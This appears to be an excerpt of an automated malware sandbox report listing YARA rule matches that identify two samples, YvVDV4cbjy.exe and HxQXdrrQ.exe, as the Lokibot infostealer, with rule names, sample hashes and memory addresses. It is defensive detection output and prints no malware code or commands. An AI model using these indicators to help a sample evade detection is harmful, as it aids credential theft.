              Source: YvVDV4cbjy.exe, 00000000.00000002.2076464821.0000000005930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs YvVDV4cbjy.exe
              Source: YvVDV4cbjy.exe, 00000000.00000000.2020659703.0000000000C96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEpxIZ.exe" vs YvVDV4cbjy.exe
              Source: YvVDV4cbjy.exe, 00000000.00000002.2065627493.0000000003019000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs YvVDV4cbjy.exe
              Source: YvVDV4cbjy.exe, 00000000.00000002.2063301617.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs YvVDV4cbjy.exe
              Source: YvVDV4cbjy.exe, 00000000.00000002.2077844783.0000000007730000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs YvVDV4cbjy.exe
              Source: YvVDV4cbjy.exeBinary or memory string: OriginalFilenameEpxIZ.exe" vs YvVDV4cbjy.exe
              Source: YvVDV4cbjy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
